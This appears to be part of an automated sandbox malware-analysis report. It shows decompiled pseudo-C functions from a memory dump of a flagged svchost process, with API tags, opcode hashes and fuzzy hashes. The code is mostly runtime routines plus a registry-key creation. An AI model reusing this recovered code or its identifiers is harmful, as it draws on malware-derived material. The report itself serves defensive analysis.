                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 2124651672-0
                                                            • Opcode ID: 786c64156ef70aaaffb7b58ecd6420f5d2136124ef28094095967dc66d24b164
                                                            • Instruction ID: 40ac4c50c85ee0450926b8e7e3a98bef2b84e3fc548124dd12d2d16b7e46176f
                                                            • Opcode Fuzzy Hash: 786c64156ef70aaaffb7b58ecd6420f5d2136124ef28094095967dc66d24b164
                                                            • Instruction Fuzzy Hash: A5014C37210A48E3EB658F56E85C39C7361F784B99F191625DA6B07BE5CF7AC4428700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E0000022B22BAF54B2D0(void* __eax, signed char __ecx, long long __rbx, long long __rcx, unsigned int __rdx, long long __r8, void* _a8, long long _a16, long long _a24, long long _a32) {
                                                            				long long _v32;
                                                            				long long _v40;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				void* _t39;
                                                            				signed char _t40;
                                                            				void* _t42;
                                                            				void* _t44;
                                                            				long long _t65;
                                                            				intOrPtr _t66;
                                                            				intOrPtr _t68;
                                                            				long long* _t73;
                                                            				unsigned long long _t78;
                                                            				void* _t79;
                                                            				long long _t82;
                                                            				void* _t83;
                                                            				long long _t94;
                                                            				long long _t98;
                                                            				unsigned long long _t103;
                                                            				long long _t106;
                                                            
                                                            				_t40 = __ecx;
                                                            				_a24 = __r8;
                                                            				_a16 = __rdx;
                                                            				_a8 = __rcx;
                                                            				_v32 = 0xfffffffe;
                                                            				_a32 = __rbx;
                                                            				if ((__rdx | 0x0000000f) - 0xfffffffe <= 0) goto 0xaf54b30d;
                                                            				goto 0xaf54b342;
                                                            				_t103 =  *((intOrPtr*)(__rcx + 0x18));
                                                            				_t78 = _t103 >> 1;
                                                            				if (_t78 - __rdx >> 1 <= 0) goto 0xaf54b342;
                                                            				if (_t103 - 0xfffffffe - _t78 > 0) goto 0xaf54b342;
                                                            				_t12 = _t78 + _t103 + 1; // 0xffffffff
                                                            				_t79 = _t12;
                                                            				if (_t79 != 0) goto 0xaf54b34f;
                                                            				goto 0xaf54b384;
                                                            				if (_t79 - 0x1000 < 0) goto 0xaf54b37c;
                                                            				_t65 = _t79 + 0x27;
                                                            				if (_t65 - _t79 > 0) goto 0xaf54b366;
                                                            				E0000022B22BAF55B374(_t65 - _t79, _t65);
                                                            				E0000022B22BAF55A7EC(_t65, _t65);
                                                            				_t14 = _t65 + 0x27; // 0x27
                                                            				 *((long long*)((_t14 & 0xffffffe0) - 8)) = _t65;
                                                            				goto 0xaf54b384;
                                                            				E0000022B22BAF55A7EC(_t65, _t65);
                                                            				_v40 = _t65;
                                                            				_t73 = _a8;
                                                            				_t106 = _a24;
                                                            				_t94 = _a16;
                                                            				_t98 = _v40;
                                                            				if (_t106 == 0) goto 0xaf54b3c3;
                                                            				if ( *((long long*)(_t73 + 0x18)) - 0x10 < 0) goto 0xaf54b3b0;
                                                            				goto 0xaf54b3b3;
                                                            				if (_t106 == 0) goto 0xaf54b3c3;
                                                            				_t39 = E0000022B22BAF562BA0(__ecx, _t42, 0, _t44, _t98, _t73, _t94, _t98, _t106);
                                                            				_t66 =  *((intOrPtr*)(_t73 + 0x18));
                                                            				if (_t66 - 0x10 < 0) goto 0xaf54b418;
                                                            				_t82 =  *_t73;
                                                            				if (_t66 + 1 - 0x1000 < 0) goto 0xaf54b413;
                                                            				if ((_t40 & 0x0000001f) == 0) goto 0xaf54b3e6;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				_t68 =  *((intOrPtr*)(_t82 - 8));
                                                            				if (_t68 - _t82 < 0) goto 0xaf54b3f5;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				_t83 = _t82 - _t68;
                                                            				if (_t83 - 8 >= 0) goto 0xaf54b404;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				if (_t83 - 0x27 <= 0) goto 0xaf54b410;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				0xaf55a85c();
                                                            				 *((long long*)(_t73 + 0x18)) = 0xf;
                                                            				 *((long long*)(_t73 + 0x10)) = 0;
                                                            				if ( *((long long*)(_t73 + 0x18)) - 0x10 < 0) goto 0xaf54b434;
                                                            				goto 0xaf54b437;
                                                            				 *_t73 = 0;
                                                            				 *_t73 = _t98;
                                                            				 *((long long*)(_t73 + 0x18)) = _t94;
                                                            				 *((long long*)(_t73 + 0x10)) = _t106;
                                                            				if ( *((long long*)(_t73 + 0x18)) - 0x10 < 0) goto 0xaf54b44f;
                                                            				 *((char*)(_t98 + _t106)) = 0;
                                                            				return _t39;
			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$ExceptionThrowstd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 545805781-0
                                                            • Opcode ID: d179f111113740c56c3e40622377fc0a32f1fd94990e7d2f3d7b479b98b365ef
                                                            • Instruction ID: dcccbd34ff3cb5786dd2a12c05d23b4d7c7e72537bbb52cb39181ad26b3ca607
                                                            • Opcode Fuzzy Hash: d179f111113740c56c3e40622377fc0a32f1fd94990e7d2f3d7b479b98b365ef
                                                            • Instruction Fuzzy Hash: 71418F33A15B44B0FA3A9AE6904E3DC73A2E744BA5F5407209A79077DBDF76C4918381
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 92%
                                                            			E0000022B22BAF571FBC(signed int __edx, void* __edi, void* __esp, intOrPtr* __rax, long long __rbx, signed int* __rcx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a24, signed short _a32, intOrPtr _a40) {
                                                            				void* _v8;
                                                            				char _v16;
                                                            				intOrPtr* _v32;
                                                            				char _v40;
                                                            				void* __rdi;
                                                            				void* _t17;
                                                            				intOrPtr* _t43;
                                                            				void* _t55;
                                                            
                                                            				_a8 = __rbx;
                                                            				_a24 = __rsi;
                                                            				_a32 = r9w;
                                                            				_t55 = __rdx;
                                                            				if (__rdx != 0) goto 0xaf571ff2;
                                                            				if (__r8 == 0) goto 0xaf571ff2;
                                                            				if (__rcx == 0) goto 0xaf571feb;
                                                            				 *__rcx =  *__rcx & __edx;
                                                            				goto 0xaf572081;
                                                            				if (__rcx == 0) goto 0xaf571ffa;
                                                            				 *__rcx =  *__rcx | 0xffffffff;
                                                            				if (__r8 - 0x7fffffff <= 0) goto 0xaf572016;
                                                            				_t17 = E0000022B22BAF567054(__rax);
                                                            				 *__rax = 0x16;
                                                            				E0000022B22BAF564328(_t17);
                                                            				goto 0xaf57207f;
                                                            				E0000022B22BAF56440C(__rax, __rcx,  &_v40, _a40);
                                                            				_t43 = _v32;
                                                            				if ( *((long long*)(_t43 + 0x138)) != 0) goto 0xaf5720b0;
                                                            				if ((_a32 & 0x0000ffff) - 0xff <= 0) goto 0xaf572093;
                                                            				if (_t55 == 0) goto 0xaf572060;
                                                            				if (__r8 == 0) goto 0xaf572060;
                                                            				E0000022B22BAF563830(0xff, 0, __edi, __esp, _t55, _a40, __r8, __r8);
                                                            				E0000022B22BAF567054(_t43);
                                                            				 *_t43 = 0x2a;
                                                            				if (_v16 == 0) goto 0xaf57207f;
                                                            				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
                                                            				return 0x2a;
			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 4141327611-0
                                                            • Opcode ID: 49d5ea05e627631afe78f50cb6792a66ccb26636e1ed8aa2d18b4d5ad3875411
                                                            • Instruction ID: 628d8b85e93a71575697f05a7d6b94d9df63c5960bb0bbdd3761e7887139c444
                                                            • Opcode Fuzzy Hash: 49d5ea05e627631afe78f50cb6792a66ccb26636e1ed8aa2d18b4d5ad3875411
                                                            • Instruction Fuzzy Hash: F4417163604780A6FF779BD1D44C3E97BA1EB80B90F1885209B9546EDBDF3AC842CB10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$CompletionPostQueuedStatusSwitchThread
                                                            • String ID:
                                                            • API String ID: 3621116444-0
                                                            • Opcode ID: e2530293fbe43ee9140c07156ca772867a552d3b5bfb7baf78460d04d5f53306
                                                            • Instruction ID: 3a05d783a80c1f44bb52a88d1bc5804bbcc2dfa3af3055e64e691d97364a93f2
                                                            • Opcode Fuzzy Hash: e2530293fbe43ee9140c07156ca772867a552d3b5bfb7baf78460d04d5f53306
                                                            • Instruction Fuzzy Hash: 87310133300650A6EBBA8BA5A88C3EE7791F7447A5F140035DF19876E1DF3AC49A9700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 35%
                                                            			E0000022B22BAF543A40(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long __r12, long long __r14, long long _a8, char _a16, long long _a24, long long _a32) {
                                                            				intOrPtr _v56;
                                                            				long long _v64;
                                                            				char _v72;
                                                            				long long _v88;
                                                            				long long _v96;
                                                            				long long _v104;
                                                            				intOrPtr _v112;
                                                            				intOrPtr _v120;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				void* _t39;
                                                            				void* _t42;
                                                            				void* _t48;
                                                            				long long _t64;
                                                            				void* _t65;
                                                            				long long _t72;
                                                            				long long _t74;
                                                            				void* _t78;
                                                            				void* _t82;
                                                            
                                                            				_t48 = __rax;
                                                            				_a32 = __rbx;
                                                            				_t74 = __rdx + 1;
                                                            				_v64 = _t74;
                                                            				_t82 = __rdx;
                                                            				_v56 = 0;
                                                            				_t78 = __rcx;
                                                            				r9d = __rbx - 1;
                                                            				_t72 = __r9 + _t74;
                                                            				_v72 = _t72;
                                                            				if (_t72 - _t74 - 4 >= 0) goto 0xaf543a89;
                                                            				_v56 = 1;
                                                            				goto 0xaf543a95;
                                                            				_v64 = _t74 + 4;
                                                            				E0000022B22BAF543530( &_v72);
                                                            				_t65 = _t48;
                                                            				if (_v56 != 0) goto 0xaf543b71;
                                                            				_a8 = __r12;
                                                            				r12d = __rbx + 4;
                                                            				_a24 = __r14;
                                                            				LocalAlloc(??, ??);
                                                            				E0000022B22BAF562BA0(0x40, 0, _t39, _t42, _t48, _t82, _t64, _t65, __rbx);
                                                            				_v88 = _t64;
                                                            				_v96 =  &_a16;
                                                            				r9d = 0;
                                                            				_v104 = _t64;
                                                            				r8d = 0;
                                                            				_v112 = 0x104;
                                                            				_v120 = 0;
                                                            				_a16 = _t64;
                                                            				dil = RegCreateKeyExW(??, ??, ??, ??, ??, ??, ??, ??, ??) == 0;
                                                            				if (_a16 == 0) goto 0xaf543b35;
                                                            				RegCloseKey(??);
                                                            				 *((intOrPtr*)(__rbx + _t48)) = 0;
                                                            				r9b = 0x3f;
                                                            				r8d = r12d;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t78 + 8)), _t48);
                                                            				LocalFree(??);
                                                            				if (_t65 == 0) goto 0xaf543b71;
                                                            				return E0000022B22BAF55A7E4( &_a16, _t65);
                                                            			}
                                                            0x22baf543a40
                                                            0x22baf543a40
                                                            0x22baf543a50
                                                            0x22baf543a59
                                                            0x22baf543a5e
                                                            0x22baf543a61
                                                            0x22baf543a65
                                                            0x22baf543a68
                                                            0x22baf543a6c
                                                            0x22baf543a6f
                                                            0x22baf543a7b
                                                            0x22baf543a7d
                                                            0x22baf543a87
                                                            0x22baf543a90
                                                            0x22baf543a9a
                                                            0x22baf543a9f
                                                            0x22baf543aa6
                                                            0x22baf543aac
                                                            0x22baf543ab9
                                                            0x22baf543abd
                                                            0x22baf543ac8
                                                            0x22baf543ada
                                                            0x22baf543adf
                                                            0x22baf543aec
                                                            0x22baf543af1
                                                            0x22baf543af4
                                                            0x22baf543af9
                                                            0x22baf543afc
                                                            0x22baf543b0a
                                                            0x22baf543b0e
                                                            0x22baf543b26
                                                            0x22baf543b2d
                                                            0x22baf543b2f
                                                            0x22baf543b35
                                                            0x22baf543b39
                                                            0x22baf543b40
                                                            0x22baf543b46
                                                            0x22baf543b4e
                                                            0x22baf543b67
                                                            0x22baf543b84

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AllocCloseCreateFree
                                                            • String ID:
                                                            • API String ID: 1942913825-0
                                                            • Opcode ID: 6266b8850dadb8dcfdd91313a7e25dcba68bb902fcc5f06c473cfbf84cc4cac2
                                                            • Instruction ID: 37f7cc3af3bd7fe5bdac1b536fa22aa08ad85646727ae9bfcb96825e14e246bc
                                                            • Opcode Fuzzy Hash: 6266b8850dadb8dcfdd91313a7e25dcba68bb902fcc5f06c473cfbf84cc4cac2
                                                            • Instruction Fuzzy Hash: 4C31A8336187D0A6EB319F92F80879ABBA5F784B94F404019AF9907B6ACF79C444CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 49%
                                                            			E0000022B22BAF555620(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r9, void* __r10, void* __r11, void* __r12, void* __r13, void* __r15, long long _a8, long long _a16, long long _a24, long long _a32, intOrPtr _a40) {
                                                            				void* _t23;
                                                            				void* _t25;
                                                            				intOrPtr _t34;
                                                            				intOrPtr _t35;
                                                            				void* _t62;
                                                            				void* _t65;
                                                            				void* _t83;
                                                            
                                                            				_a16 = __rbp;
                                                            				_a24 = __rsi;
                                                            				_a32 = __rdi;
                                                            				_t34 = r8d;
                                                            				_t83 = __rdx;
                                                            				_t65 = __rcx;
                                                            				if ( *((intOrPtr*)(__rcx + 0x30)) == 2) goto 0xaf555651;
                                                            				goto 0xaf55572e;
                                                            				_a8 = __rbx;
                                                            				EnterCriticalSection(??);
                                                            				if ( *((intOrPtr*)(__rcx + 0x30)) == 2) goto 0xaf555670;
                                                            				goto 0xaf5556f9;
                                                            				if (_t34 - 0x18 >= 0) goto 0xaf55567f;
                                                            				goto 0xaf5556f9;
                                                            				r8d = _t34;
                                                            				if (E0000022B22BAF553CE0( *((intOrPtr*)(__rcx + 0x60)), __rdx, __rcx, __r9, __r9, __r10, __r11, __r12, __r13, __r15) != 0) goto 0xaf555675;
                                                            				_t35 = _a40;
                                                            				r8d = _t35;
                                                            				_t23 = E0000022B22BAF5535F0(_t22,  *((intOrPtr*)(_t65 + 0x60)), __r9);
                                                            				if (_t23 < 0) goto 0xaf5556ef;
                                                            				r14d = 0;
                                                            				r9d = _t23;
                                                            				_t62 =  ==  ? _t83 :  *((intOrPtr*)(_t65 + 0x10)) + 8;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t65 + 8)) + 8)) + 0x150))() == 2) goto 0xaf5556ff;
                                                            				r8d = _t35;
                                                            				_t25 = E0000022B22BAF5535F0(_t24,  *((intOrPtr*)(_t65 + 0x60)), __r9);
                                                            				if (_t25 >= 0) goto 0xaf5556b0;
                                                            				if (_t25 != 0xfffffffd) goto 0xaf555710;
                                                            				__imp__#112();
                                                            				LeaveCriticalSection(??);
                                                            				goto 0xaf555729;
                                                            				LeaveCriticalSection(??);
                                                            				E0000022B22BAF5558E0(1, __rbx, _t65);
                                                            				return 0;
                                                            			}
                                                            0x22baf555620
                                                            0x22baf555625
                                                            0x22baf55562a
                                                            0x22baf55563c
                                                            0x22baf55563f
                                                            0x22baf555642
                                                            0x22baf555645
                                                            0x22baf55564c
                                                            0x22baf555655
                                                            0x22baf55565a
                                                            0x22baf555664
                                                            0x22baf55566b
                                                            0x22baf555673
                                                            0x22baf55567a
                                                            0x22baf555683
                                                            0x22baf555690
                                                            0x22baf555692
                                                            0x22baf55569d
                                                            0x22baf5556a0
                                                            0x22baf5556a7
                                                            0x22baf5556a9
                                                            0x22baf5556b4
                                                            0x22baf5556c9
                                                            0x22baf5556da
                                                            0x22baf5556e0
                                                            0x22baf5556e6
                                                            0x22baf5556ed
                                                            0x22baf5556f2
                                                            0x22baf5556f9
                                                            0x22baf555703
                                                            0x22baf55570e
                                                            0x22baf555714
                                                            0x22baf555722
                                                            0x22baf555743

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                            • String ID:
                                                            • API String ID: 4082018349-0
                                                            • Opcode ID: 07d812929624a19d906926a0387a4544e819f4e1615160d9d3374db27358f480
                                                            • Instruction ID: 91529605b76d5313ca008fabc55836bb0eaccb7b82ad79ac7cd19172c76d65c2
                                                            • Opcode Fuzzy Hash: 07d812929624a19d906926a0387a4544e819f4e1615160d9d3374db27358f480
                                                            • Instruction Fuzzy Hash: BD317F32310684A3EB619BA6D54C3AD7361FB85BC8F401425EF0A87F96DF3BD4618700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterErrorEventExceptionLastLeaveRaise
                                                            • String ID:
                                                            • API String ID: 186860204-0
                                                            • Opcode ID: e4b679cd45f37feb26e16d6bf338db8cf06e0fc70ad0c626ff0a49fbcb54a1b6
                                                            • Instruction ID: 713c381cb72c303bad2e20796e15c6f925e2d09c1553d780adcf5e7ceef4e0c0
                                                            • Opcode Fuzzy Hash: e4b679cd45f37feb26e16d6bf338db8cf06e0fc70ad0c626ff0a49fbcb54a1b6
                                                            • Instruction Fuzzy Hash: 5B21E733314B4092EB759B55E94C7AE37A2ABC4FD0F189424DD0A4BB5ADF3BC8455740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$recv
                                                            • String ID:
                                                            • API String ID: 316788870-0
                                                            • Opcode ID: 1331d8fd4fcc461728bc65949414e664a81ad9ccc88d6bb7573b02ad11ded56e
                                                            • Instruction ID: 3b11d726feed856c260b43abc9297e14ceb87d251b178460e7e6fa399fc4aea2
                                                            • Opcode Fuzzy Hash: 1331d8fd4fcc461728bc65949414e664a81ad9ccc88d6bb7573b02ad11ded56e
                                                            • Instruction Fuzzy Hash: 0B21A97330094193EBB58FAAE44C39D37A0F748B8CF444124DE098778AEF7AC8958B40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 66%
                                                            			E0000022B22BAF54B38B(signed char __ecx, long long _a32, long long* _a80, long long _a88, long long _a96, void* _a104) {
                                                            				void* _t18;
                                                            				signed char _t19;
                                                            				void* _t20;
                                                            				void* _t21;
                                                            				void* _t22;
                                                            				intOrPtr _t34;
                                                            				intOrPtr _t36;
                                                            				long long* _t39;
                                                            				long long _t43;
                                                            				void* _t44;
                                                            				long long _t48;
                                                            				long long _t50;
                                                            				long long _t55;
                                                            
                                                            				_t19 = __ecx;
                                                            				_t39 = _a80;
                                                            				_t55 = _a96;
                                                            				_t48 = _a88;
                                                            				_t50 = _a32;
                                                            				if (_t55 == 0) goto 0xaf54b3c3;
                                                            				if ( *((long long*)(_t39 + 0x18)) - 0x10 < 0) goto 0xaf54b3b0;
                                                            				goto 0xaf54b3b3;
                                                            				if (_t55 == 0) goto 0xaf54b3c3;
                                                            				_t18 = E0000022B22BAF562BA0(__ecx, _t20, _t21, _t22, _t50, _t39, _t48, _t50, _t55);
                                                            				_t34 =  *((intOrPtr*)(_t39 + 0x18));
                                                            				if (_t34 - 0x10 < 0) goto 0xaf54b418;
                                                            				_t43 =  *_t39;
                                                            				if (_t34 + 1 - 0x1000 < 0) goto 0xaf54b413;
                                                            				if ((_t19 & 0x0000001f) == 0) goto 0xaf54b3e6;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				_t36 =  *((intOrPtr*)(_t43 - 8));
                                                            				if (_t36 - _t43 < 0) goto 0xaf54b3f5;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				_t44 = _t43 - _t36;
                                                            				if (_t44 - 8 >= 0) goto 0xaf54b404;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				if (_t44 - 0x27 <= 0) goto 0xaf54b410;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				0xaf55a85c();
                                                            				 *((long long*)(_t39 + 0x18)) = 0xf;
                                                            				 *((long long*)(_t39 + 0x10)) = 0;
                                                            				if ( *((long long*)(_t39 + 0x18)) - 0x10 < 0) goto 0xaf54b434;
                                                            				goto 0xaf54b437;
                                                            				 *_t39 = 0;
                                                            				 *_t39 = _t50;
                                                            				 *((long long*)(_t39 + 0x18)) = _t48;
                                                            				 *((long long*)(_t39 + 0x10)) = _t55;
                                                            				if ( *((long long*)(_t39 + 0x18)) - 0x10 < 0) goto 0xaf54b44f;
                                                            				 *((char*)(_t50 + _t55)) = 0;
                                                            				return _t18;
                                                            			}
                                                            0x22baf54b38b
                                                            0x22baf54b38b
                                                            0x22baf54b390
                                                            0x22baf54b395
                                                            0x22baf54b39a
                                                            0x22baf54b3a2
                                                            0x22baf54b3a9
                                                            0x22baf54b3ae
                                                            0x22baf54b3b6
                                                            0x22baf54b3be
                                                            0x22baf54b3c3
                                                            0x22baf54b3cb
                                                            0x22baf54b3d0
                                                            0x22baf54b3d9
                                                            0x22baf54b3de
                                                            0x22baf54b3e0
                                                            0x22baf54b3e5
                                                            0x22baf54b3e6
                                                            0x22baf54b3ed
                                                            0x22baf54b3ef
                                                            0x22baf54b3f4
                                                            0x22baf54b3f5
                                                            0x22baf54b3fc
                                                            0x22baf54b3fe
                                                            0x22baf54b403
                                                            0x22baf54b408
                                                            0x22baf54b40a
                                                            0x22baf54b40f
                                                            0x22baf54b413
                                                            0x22baf54b418
                                                            0x22baf54b420
                                                            0x22baf54b42d
                                                            0x22baf54b432
                                                            0x22baf54b437
                                                            0x22baf54b43a
                                                            0x22baf54b43d
                                                            0x22baf54b441
                                                            0x22baf54b44a
                                                            0x22baf54b44f
                                                            0x22baf54b461

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: 464eb3f5ecf2c8020d2d25362553f5ea3049e32b98d732d29596f69cc6cbbe15
                                                            • Instruction ID: 3f74521e0f17c9c50186317101a49b47c89bcdaf8e0dddecfc64e6c273be798a
                                                            • Opcode Fuzzy Hash: 464eb3f5ecf2c8020d2d25362553f5ea3049e32b98d732d29596f69cc6cbbe15
                                                            • Instruction Fuzzy Hash: BE211533A14B44A1EB6AAEE6D05E3DD3362E740B85F580811CB5903BDBCFBAC4918385
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$EnterEvent
                                                            • String ID:
                                                            • API String ID: 3394196147-0
                                                            • Opcode ID: 921e72b74e47ec9a7a4f8a2a3f6ea007de81605dde28e44da26c3a9cf5338a2b
                                                            • Instruction ID: cc8123997c1c94489a9a52de2255ff6300be3b9724cabce02a969b4e1e0911f0
                                                            • Opcode Fuzzy Hash: 921e72b74e47ec9a7a4f8a2a3f6ea007de81605dde28e44da26c3a9cf5338a2b
                                                            • Instruction Fuzzy Hash: 51212732315B80A3DB59CF66E5883ADB7A4F788B80F148425DB6A83B25DF35E4A5C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0000022B22BAF5553C0(void* __rcx) {
                                                            
                                                            				if ( *((intOrPtr*)(__rcx + 0x30)) == 2) goto 0xaf5553da;
                                                            				return 0x139f;
                                                            			}

                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 669cde3306ac89cada78302f0567bb84924d324274d40de79fc452c85d8811fa
                                                            • Instruction ID: 523ead1a52db772a93e94782ea44be5b090fe8ecf004f4cbc65fc39d96cae391
                                                            • Opcode Fuzzy Hash: 669cde3306ac89cada78302f0567bb84924d324274d40de79fc452c85d8811fa
                                                            • Instruction Fuzzy Hash: 72118633720944D3EBB28B95E45D1AD7365FB84B89F081011EE0A877AADF36C9D6C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E0000022B22BAF56F1F8(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
                                                            				void* _t4;
                                                            				void* _t9;
                                                            				intOrPtr _t11;
                                                            				intOrPtr _t14;
                                                            				void* _t23;
                                                            				void* _t29;
                                                            				void* _t32;
                                                            				void* _t33;
                                                            
                                                            				_t29 = __rdx;
                                                            				_t27 = __rcx;
                                                            				_t25 = __rbx;
                                                            				_t23 = __rax;
                                                            				_a8 = __rbx;
                                                            				GetLastError();
                                                            				_t11 =  *0xaf59504c; // 0x7
                                                            				if (_t11 == 0xffffffff) goto 0xaf56f222;
                                                            				_t4 = E0000022B22BAF56FB8C(_t11, _t11 - 0xffffffff, __rax, __rbx, __rcx);
                                                            				if (__rax != 0) goto 0xaf56f263;
                                                            				E0000022B22BAF56EDC4(_t4, _t27, _t29);
                                                            				_t32 = _t23;
                                                            				if (_t23 != 0) goto 0xaf56f242;
                                                            				E0000022B22BAF56ED24(_t23, _t27);
                                                            				goto 0xaf56f27e;
                                                            				_t14 =  *0xaf59504c; // 0x7
                                                            				if (E0000022B22BAF56FBE4(_t14, _t23, _t23, _t25, _t27, _t23, _t33) == 0) goto 0xaf56f23b;
                                                            				E0000022B22BAF56EF64(_t32, _t23);
                                                            				_t9 = E0000022B22BAF56ED24(_t23, _t32);
                                                            				if (_t32 == 0) goto 0xaf56f27e;
                                                            				SetLastError(??);
                                                            				return _t9;
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$abort
                                                            • String ID:
                                                            • API String ID: 1447195878-0
                                                            • Opcode ID: d955182636fa35cdd05e9aa16b0c433bc111d8b3d33d9709ce52786f47b88afe
                                                            • Instruction ID: bd00de81a952899c8d29a8b531dd0b66cda9ce9ac27e4e4a8fba744859c09b15
                                                            • Opcode Fuzzy Hash: d955182636fa35cdd05e9aa16b0c433bc111d8b3d33d9709ce52786f47b88afe
